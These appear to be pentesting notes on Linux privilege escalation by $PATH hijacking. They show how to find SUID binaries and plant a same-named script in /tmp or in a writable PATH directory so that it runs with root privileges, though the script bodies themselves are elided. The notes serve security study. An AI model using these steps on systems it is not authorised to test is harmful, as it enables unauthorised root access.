$PATH

$PATH environment variable

$ echo $ PATH
...

Possible exploitable scenarios

1. A script with SUID bit (/usr/bin/bin-with-suid) is found to execute a particular named script that is not defined

Assume the named script that is executed is test-bin

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/bin-with-suid

$ /usr/bin/bin-with-suid
# error message indicating that test-bin is executed, but not found
sh: 1: test-bin: not found 

a)$PATH environment variable can be edited ONLY

b) Write permissions for a default value found in the $PATHenvironment variable ONLY

Scenario a)

$ echo $PATH
/usr/local/sbin:/usr/local/bin ...

$ export PATH=/tmp:$PATH 

$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin ...

$ cd /tmp
$ nano test-bin
#!/...
...

$ /usr/bin/bin-with-suid
... executes /tmp/test-bin with ROOT privileges

Scenario b)

$ echo $PATH
/usr/local/sbin:/usr/local/bin ...

$ find / -writable 2>/dev/null
...
/usr/local/bin
...

$ cd /usr/local/bin
$ nano test-bin
#!/...
...

$ /usr/bin/bin-with-suid
... executes /usr/local/bin/test-bin with ROOT privileges

1. A script with SUID bit (/usr/bin/bin-with-suid) is found to execute a named script that is defined

Assume the named script that is executed is test-bin (present in /usr/local/bin/)

a)$PATH environment variable can be edited ONLY

b) Write permissions for a path value in the$PATHenvironment variable ONLY

Scenario a)

Prepend a writable directory such as /tmp to the $PATH environment variable, and create a script with the name of that executed from the original script, in the same directory. This allows the created script to be executed with root privileges.

$ export PATH=/tmp:$PATH 

$ cd /tmp
$ nano test-bin
#!/...
...

$ /usr/bin/bin-with-suid
... executes /tmp/test-bin with ROOT privileges

Scenario b)

There are 2 further possible scenarios

1. The path value we have write permissions for appears before the path where the named script is found. This allows us to trick the SUID bit script to execute the script defined by us instead. This is because the system searches for script using the path variable listed from left to right in the $PATHenvironment variable

Assume that we have write permissions for the folder/usr/local/sbin, and this path appears to the left of the value /usr/local/bin(path for the original script) in$PATH

$ echo $PATH
/usr/local/sbin:/usr/local/bin ...

$ cd /usr/local/sbin

$ find / -name test-bin 2>/dev/null
/usr/local/bin/test-bin

$ nano test-bin
#!...
...

$ /usr/bin/bin-with-suid
# notice that the path is /usr/local/sbin, and NOT /usr/local/bin
... executes /usr/local/sbin/test-bin with ROOT privileges

1. We have write permissions for the actual path of the named script

$ ls -l /usr/local | grep bin
drwxrwxrwx 2 root   root   xxxx xxx  x ... bin
...

$ cd /usr/local/bin

$ rm test-bin

$ nano test-bin
#!...
...

$ /usr/bin/bin-with-suid
... executes /usr/local/bin/test-bin defined by yourself - with ROOT privileges